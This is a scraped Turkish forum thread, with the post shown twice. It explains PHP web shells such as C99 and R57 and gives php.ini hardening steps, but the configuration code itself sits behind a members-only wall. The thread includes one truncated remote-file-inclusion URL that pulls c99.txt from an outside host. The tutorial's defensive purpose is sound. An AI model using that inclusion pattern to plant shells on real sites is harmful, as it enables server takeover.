vbulletin güvenlik Shell Nedir Shellden korunma yöntemleri

Konuyu değerlendir: Geçerli Reyting :

Görüntüleme : 3878

Yorumlar : 3

Bilgilendirme : Bu konuya son mesaj 1060 gün önce yazıldı . Eğer yazınız doğrudan bu konu ile ilgili değil ise yeni bir konu başlatmanızı tavsiye ederiz.
  1. offline
    Gladius - ait Kullanıcı Resmi (Avatar)

    Shell Nedir Shellden korunma yöntemleri

    Merhabalar, uzun zamandan gelen bir şey olan SHELL ile hack yönteminden korunmanın yolları bazı işlemlerden geçiyor.

    1) SHELL NEDİR?

    PHP’ nin en büyük sorunlarından biridir. Dosyanın nereden geldiği ya da nasıl geldiği önemli değil önemli olan o dosyanın sunucuda olup olmamasıdır varsa PHP çalıştırma işlemlerini yapacaktır. Kodların işlenmesi ile geçmiş olsun sizde HACKLENDİNİZ! Onun için varsa sunucu şirketiniz ile irtibata geçip birazdan anlatacağım korunma yollarını talep ediniz eğer sunucu sizinse ve “root” yetkilisi sizseniz gerekli savunmayı kendiniz kolaylıkla yapabilirsiniz.

    Başlıca SHELL tipleri, C99, R57, C100, ASPXspy2… devam eder.Bir kaç örnek vermek gerekirse

    cL..... adında bir hacker tarafından Kanal 3 hacklenmişti. Burada yaptığı şey yine basit bir shell ile saldırmak olmuştu.

    Aynı zaman da bir çok hack timine bağlı insanlar bunu yapmaktadır.

    Kısaca özetlemek gerekirsek SHELL sistem de sizi temel yetkilerle yetkilendirir.(Okuma, Yazma, Silme…)

    2)SHELL NASIL KULLANILIR?

    Bunun bir çok farklı kullanımı bulunmaktadır.Özellikle programcılığın arttığı bu yıllar da bir çok farklı yöntem geliştirildi.Başlıca kullanımlar;

    http://www.siteadi.com/index.php?den...z.com/c99.txt?


    Bu örnekte index.php’ye c99.txt adlı metni siteden çek bu sayede sitenize c99.txt dosyası upload edildi.PHP değil çalışmaz ki düşüncesine sahip tanıdıklarım olduğu için belirtiyorum. YOK ÖYLE BİR DÜNYA ne yazık ki sistem bu dosyada ki kodları da işliyor.Bazen de upload açıkları oluyor örnek vermek gerekirse bir siteye girdiniz eğer dosyaları kontrol etmeden direk sunucuya taşıyorsa vay haline en fazla bir kaç saat ömrü var demektir.PHP dosyaları her ne olursa olsun sunucuda direkt olarak çalıştırılır.

    Sisteme girdikten sonra çıkan ekran;






    Bu gördüğünüz bir C99 örneğidir.Sisteme girdikten sonra yalnızca hacker’ın size yapıcağı şovları izlemek ile yetinirsiniz.


    3)Korunma Yolları

    İşte şimdi işin en güzel “Gardaş biz bu adamları durduramayız mı?” sorusunun cevabı elbette durdurulur.Zekice planlanmış bir savunma duvarı ile kendinizi en azından “lamer” tabirini kullandığımız 10-16 yaş grubu çocukları sitenizden uzak tutar. Gelelim korumaya;

    Sunucuya “ROOT” olarak giriş yapın.(Giriş yapmak için genel de putty kullanılır.)

    php.ini dosyasını düzenlemek için pico – vi – ya da nano editörlerinden birini kullanabilirsiniz. Ben pico’yu tercih ediyorum.

    PHP- Kodu:

    Bu alandaki kodları görebilmek için üye olmanız gereklidir.Üye Olmak İçin Tiklayın...

    yada php ayar dosyasını komutuyla açıyoruz…

    PHP- Kodu:

    Bu alandaki kodları görebilmek için üye olmanız gereklidir.Üye Olmak İçin Tiklayın...

    Open Basedir karşısına yazıyoruz .

    PHP- Kodu:

    Bu alandaki kodları görebilmek için üye olmanız gereklidir.Üye Olmak İçin Tiklayın...

    Disable functions : Satırına yapıştırın bunları ..

    PHP- Kodu:

    Bu alandaki kodları görebilmek için üye olmanız gereklidir.Üye Olmak İçin Tiklayın...

    ctrl+x yazın y tıklayıp enterlayın ardından service htttpd restart yapıyoruz.

    Suse ise
    service apache2 restart yapıyoruz.

    Bu korumalardan sonra shell yalnızca CHMOD 777 yetkisine sahip olan klasörlere atılabilir halde olucaktır. vBulletin vb. Forum yazılımı kullanıyorsanız Mutlaka Configleri criptolayınız.

    Selamlar Sevgiler
    Eklenen Resimlerin Önizlemeleri Eklenen Resimlerin Önizlemeleri c99.jpg  
    3gen, eTiKeT™, LaDezs, mehmetuzn, MySimS3k® Bunu beğendi.
  2. #1
    Merhabalar, uzun zamandan gelen bir şey olan SHELL ile hack yönteminden korunmanın yolları bazı işlemlerden geçiyor.

    1) SHELL NEDİR?

    PHP’ nin en büyük sorunlarından biridir. Dosyanın nereden geldiği ya da nasıl geldiği önemli değil önemli olan o dosyanın sunucuda olup olmamasıdır varsa PHP çalıştırma işlemlerini yapacaktır. Kodların işlenmesi ile geçmiş olsun sizde HACKLENDİNİZ! Onun için varsa sunucu şirketiniz ile irtibata geçip birazdan anlatacağım korunma yollarını talep ediniz eğer sunucu sizinse ve “root” yetkilisi sizseniz gerekli savunmayı kendiniz kolaylıkla yapabilirsiniz.

    Başlıca SHELL tipleri, C99, R57, C100, ASPXspy2… devam eder.Bir kaç örnek vermek gerekirse

    cL..... adında bir hacker tarafından Kanal 3 hacklenmişti. Burada yaptığı şey yine basit bir shell ile saldırmak olmuştu.

    Aynı zaman da bir çok hack timine bağlı insanlar bunu yapmaktadır.

    Kısaca özetlemek gerekirsek SHELL sistem de sizi temel yetkilerle yetkilendirir.(Okuma, Yazma, Silme…)

    2)SHELL NASIL KULLANILIR?

    Bunun bir çok farklı kullanımı bulunmaktadır.Özellikle programcılığın arttığı bu yıllar da bir çok farklı yöntem geliştirildi.Başlıca kullanımlar;

    http://www.siteadi.com/index.php?den...z.com/c99.txt?


    Bu örnekte index.php’ye c99.txt adlı metni siteden çek bu sayede sitenize c99.txt dosyası upload edildi.PHP değil çalışmaz ki düşüncesine sahip tanıdıklarım olduğu için belirtiyorum. YOK ÖYLE BİR DÜNYA ne yazık ki sistem bu dosyada ki kodları da işliyor.Bazen de upload açıkları oluyor örnek vermek gerekirse bir siteye girdiniz eğer dosyaları kontrol etmeden direk sunucuya taşıyorsa vay haline en fazla bir kaç saat ömrü var demektir.PHP dosyaları her ne olursa olsun sunucuda direkt olarak çalıştırılır.

    Sisteme girdikten sonra çıkan ekran;






    Bu gördüğünüz bir C99 örneğidir.Sisteme girdikten sonra yalnızca hacker’ın size yapıcağı şovları izlemek ile yetinirsiniz.


    3)Korunma Yolları

    İşte şimdi işin en güzel “Gardaş biz bu adamları durduramayız mı?” sorusunun cevabı elbette durdurulur.Zekice planlanmış bir savunma duvarı ile kendinizi en azından “lamer” tabirini kullandığımız 10-16 yaş grubu çocukları sitenizden uzak tutar. Gelelim korumaya;

    Sunucuya “ROOT” olarak giriş yapın.(Giriş yapmak için genel de putty kullanılır.)

    php.ini dosyasını düzenlemek için pico – vi – ya da nano editörlerinden birini kullanabilirsiniz. Ben pico’yu tercih ediyorum.

    PHP- Kodu:

    Bu alandaki kodları görebilmek için üye olmanız gereklidir.Üye Olmak İçin Tiklayın...

    yada php ayar dosyasını komutuyla açıyoruz…

    PHP- Kodu:

    Bu alandaki kodları görebilmek için üye olmanız gereklidir.Üye Olmak İçin Tiklayın...

    Open Basedir karşısına yazıyoruz .

    PHP- Kodu:

    Bu alandaki kodları görebilmek için üye olmanız gereklidir.Üye Olmak İçin Tiklayın...

    Disable functions : Satırına yapıştırın bunları ..

    PHP- Kodu:

    Bu alandaki kodları görebilmek için üye olmanız gereklidir.Üye Olmak İçin Tiklayın...

    ctrl+x yazın y tıklayıp enterlayın ardından service htttpd restart yapıyoruz.

    Suse ise
    service apache2 restart yapıyoruz.

    Bu korumalardan sonra shell yalnızca CHMOD 777 yetkisine sahip olan klasörlere atılabilir halde olucaktır. vBulletin vb. Forum yazılımı kullanıyorsanız Mutlaka Configleri criptolayınız.

    Selamlar Sevgiler
    Eklenen Resimlerin Önizlemeleri Eklenen Resimlerin Önizlemeleri c99.jpg  
    3gen, eTiKeT™, LaDezs, mehmetuzn, MySimS3k® Bunu beğendi.

  3. offline
    MySimS3k® - ait Kullanıcı Resmi (Avatar)

    Cevap: Shell Nedir Shellden korunma yöntemleri

    Eline emeğine sağlık kardeşim güzel ve faydalı bir makale olmuş
    eTiKeT™, Gladius Bunu beğendi.
  4. #2
    Eline emeğine sağlık kardeşim güzel ve faydalı bir makale olmuş
    eTiKeT™, Gladius Bunu beğendi.

  5. offline
    LaDezs - ait Kullanıcı Resmi (Avatar)

    Cevap: Shell Nedir Shellden korunma yöntemleri

    Paylaşımına Sağlık @Orbay Eser Teşekkür Ediyorum. Aynı İşin Mağduru Olarak Önemini Çok İyi Biliyorum
    Sonraki paylaşımında " Configleri criptolamak" İşine Yer verirsen Çok İyi Olacaktır : ) ( :
    eTiKeT™, Gladius Bunu beğendi.
  6. #3
    Paylaşımına Sağlık @Orbay Eser Teşekkür Ediyorum. Aynı İşin Mağduru Olarak Önemini Çok İyi Biliyorum
    Sonraki paylaşımında " Configleri criptolamak" İşine Yer verirsen Çok İyi Olacaktır : ) ( :
    eTiKeT™, Gladius Bunu beğendi.

  7. offline
    Gladius - ait Kullanıcı Resmi (Avatar)

    Cevap: Shell Nedir Shellden korunma yöntemleri

       LaDezs Nickli Üyeden Alıntı
    Paylaşımına Sağlık @Orbay Eser Teşekkür Ediyorum. Aynı İşin Mağduru Olarak Önemini Çok İyi Biliyorum
    Sonraki paylaşımında " Configleri criptolamak" İşine Yer verirsen Çok İyi Olacaktır : ) ( :
    Tabiki hocam örnekler vererek paylaşırım... Faydalı oldu ise ne mutlu bana..
  8. #4
       LaDezs Nickli Üyeden Alıntı
    Paylaşımına Sağlık @Orbay Eser Teşekkür Ediyorum. Aynı İşin Mağduru Olarak Önemini Çok İyi Biliyorum
    Sonraki paylaşımında " Configleri criptolamak" İşine Yer verirsen Çok İyi Olacaktır : ) ( :
    Tabiki hocam örnekler vererek paylaşırım... Faydalı oldu ise ne mutlu bana..

Benzer Konular
  1. vBulletin Null Sürümlerdeki Shell Tehlikesi !
    Konu Sahibi TurkCoder Forum vBulletin güvenlik işlemleri
    Cevap: 4
    Son Mesaj : 23.Mayıs.2017, 15:58
  2. includes/class_dm_roomforum.php base 64 şifrelenmiş shell
    Konu Sahibi tolizuga Forum vBulletin Sorunlarınız
    Cevap: 2
    Son Mesaj : 07.Nisan.2015, 15:11
  3. Rss nedir ?
    Konu Sahibi Tunna Bulutlu Forum vBulletin Sorunlarınız
    Cevap: 2
    Son Mesaj : 28.Şubat.2014, 12:14
  4. Bilgilendirme vBulletin default tema ile test,deneme nedir ? yapılmasının amacı ve önemi nedir ?
    Konu Sahibi eTiKeT™ Forum vBulletin Terimler Sözlüğü
    Cevap: 0
    Son Mesaj : 20.Temmuz.2013, 00:20
  5. vBulletin Nedir ?
    Konu Sahibi eTiKeT™ Forum vBulletin'i Tanıyalım
    Cevap: 0
    Son Mesaj : 27.Şubat.2012, 01:04